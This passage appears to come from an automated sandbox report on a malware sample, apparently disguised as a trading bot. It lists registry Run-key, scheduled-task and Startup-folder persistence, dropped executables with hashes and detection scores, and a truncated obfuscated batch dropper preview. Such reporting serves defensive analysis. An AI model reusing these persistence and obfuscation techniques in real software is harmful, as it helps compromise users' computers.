                                                                                                                                                                                                                                                                                                                              04:25:44API Interceptor810x Sleep call for process: apihost.exe modified
                                                                                                                                                                                                                                                                                                                              10:24:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                              10:24:46Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                              10:24:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                              10:25:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Juqmtmya.url

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.195196088872012
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxTR/o1K/v:HRYFVmTWDyzmBsOExp/v
                                                                                                                                                                                                                                                                                                                              MD5:811E900846516BECCD50DE45A1003E8B
                                                                                                                                                                                                                                                                                                                              SHA1:8A4C5E174200CD079055817B7D4FC26FEE95C56C
                                                                                                                                                                                                                                                                                                                              SHA-256:350F2C77CF673BB1FCFD190B251255ECD00F0F1F8ACB2204EF46250957D5276A
                                                                                                                                                                                                                                                                                                                              SHA-512:EC78E8B96BD801AE6A1C4E996C750B06A59FE0F3BE11E85D3A68632D4D6619503B18BA39EF9BF99333B9684A99A1CD150B55F81607F96AE615DEBC5CC34303DF
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=931400..HotKey=72..

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Libraries\Juqmtmya

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                              MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                              SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                              SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                              SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Libraries\Juqmtmya.PIF

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):1226752
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.458699684550258
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
                                                                                                                                                                                                                                                                                                                              MD5:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                              SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
                                                                                                                                                                                                                                                                                                                              SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
                                                                                                                                                                                                                                                                                                                              SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:MVy:Ms
                                                                                                                                                                                                                                                                                                                              MD5:B8A4F2F99C387B80CDA72F6B43079B8B
                                                                                                                                                                                                                                                                                                                              SHA1:A2281BBFE78D4F0D6FC03B4799FFD5D010997B13
                                                                                                                                                                                                                                                                                                                              SHA-256:90B53DF56816C127246136D4403ABA3B26CEC599B2B950FB2BA78D6C1FB4E6BF
                                                                                                                                                                                                                                                                                                                              SHA-512:413F0252867E18DD1F009F10018578790F9BFBE252B27FCC6452CB8B03E46CCAA251A9FF15CD962A45EA03469BBC7B1867A38A6F37EABEDAC29184AF5860501A
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:100..

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Libraries\aymtmquJ.cmd

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):62357
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\Libraries\aymtmquJ.pif

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                              MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                              SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                              SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                              SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                                                                                                                              C:\Users\Public\alpha.pif

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):236544
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Trading_AIBot.exe.log

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):410
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):15612
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0007665989277985
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
                                                                                                                                                                                                                                                                                                                              MD5:A8D66A40EEA8831B03CDC478ED797E6E
                                                                                                                                                                                                                                                                                                                              SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
                                                                                                                                                                                                                                                                                                                              SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
                                                                                                                                                                                                                                                                                                                              SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):2220
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.380322200793485
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:48:wYWSU4xympjgZ9tz4RIoUl8NPryHl7u1iMugeC/ZM0Uyu+d:FLHxvCZfIfSKjyFOugw1K
                                                                                                                                                                                                                                                                                                                              MD5:6978BD535342648D7294BE8C3D34E78F
                                                                                                                                                                                                                                                                                                                              SHA1:FE7A2C951FE0242FFD2F1819B0F2BF03E243F4AD
                                                                                                                                                                                                                                                                                                                              SHA-256:3312EAD9D5560AFF09A61E18ED339B2EE6D642A9007815AD2C6202505BA9C902
                                                                                                                                                                                                                                                                                                                              SHA-512:AB743BE5BA3BBDCDA77F48A7201D988E14003322538E612BB6C2F1159E621DF58B389E235EEAB17A9A7F20FB1E1E533158768A05A79F7E735668295C7F8F8E54
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:@...e................................................@..........P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                              MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                              SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                              SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                              SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.................................J...........................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):70656
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                              MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                              SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                              SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                              SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d1ue13h.crm.ps1

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfq1141n.tyg.psm1

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvj5yjum.fby.psm1

                                                                                                                                                                                                                                                                                                                              Download File
